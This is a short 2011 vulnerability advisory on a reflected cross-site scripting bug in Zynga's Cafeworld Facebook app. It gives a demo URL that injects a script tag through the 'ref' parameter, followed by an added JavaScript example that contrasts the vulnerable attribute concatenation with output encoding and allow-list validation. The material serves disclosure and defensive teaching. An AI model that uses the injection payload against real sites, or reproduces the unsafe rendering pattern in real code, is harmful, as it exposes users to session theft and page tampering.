
Zynga Cafeworld Cross Site Scripting

Posted on 30 August 2011

------------------------------------------------------------
TITLE: Type-0 XSS bug in CAFEWORLD (facebook apps)
vendor: www.apps.facebook.com/cafeworld/**[]
Author: r007k17-w a.k.a Raghavendra Karthik.D
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Google Dork: Copyright 2010 Zynga Game Network Inc
------------------------------------------------------------
DEMO:
http://apps.facebook.com/cafeworld/view_gift.php?ref="><script>alert("r007k17-w")</script>

SUG: HTML encoding, escaping special characters, input sanitization.
------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts and all my friends
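
The fixes suggested above, as an added example that is not part of the original advisory and is not Zynga's code. It assumes the ref value is written into a double-quoted HTML attribute; the function names, the hidden-input markup and the allow-list pattern are hypothetical.

```javascript
// Added example (constructed). How view_gift.php really uses `ref` is not
// known; assumption: the value lands inside a double-quoted attribute.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Output encoding: neutralise the characters that can close an attribute
// value or open a new tag.
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Input validation: accept only a short token (hypothetical allow-list),
// return null for anything else.
function validateRef(value) {
  return typeof value === "string" && /^[A-Za-z0-9_-]{1,64}$/.test(value) ? value : null;
}

// Read `ref` from a URL the way client-side code would (percent-decoded).
function refFromUrl(url) {
  return new URL(url).searchParams.get("ref");
}

// Vulnerable pattern: raw concatenation, so `">` ends the attribute and tag.
function renderUnsafe(ref) {
  return '<input type="hidden" name="ref" value="' + ref + '">';
}

// Hardened pattern: the same markup with the value encoded on output.
function renderSafe(ref) {
  return '<input type="hidden" name="ref" value="' + encodeHtml(ref) + '">';
}

// The DEMO URL from the advisory, used here as test input only.
const demoUrl =
  'http://apps.facebook.com/cafeworld/view_gift.php?ref="><script>alert("r007k17-w")</script>';
const demoRef = refFromUrl(demoUrl);

console.log("unsafe:", renderUnsafe(demoRef));
console.log("safe:  ", renderSafe(demoRef));
console.log("valid: ", validateRef(demoRef), validateRef("gift_123"));
```

Encoding on output is the control that closes the hole; the allow-list is a second layer that rejects the value before it is ever rendered.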

 
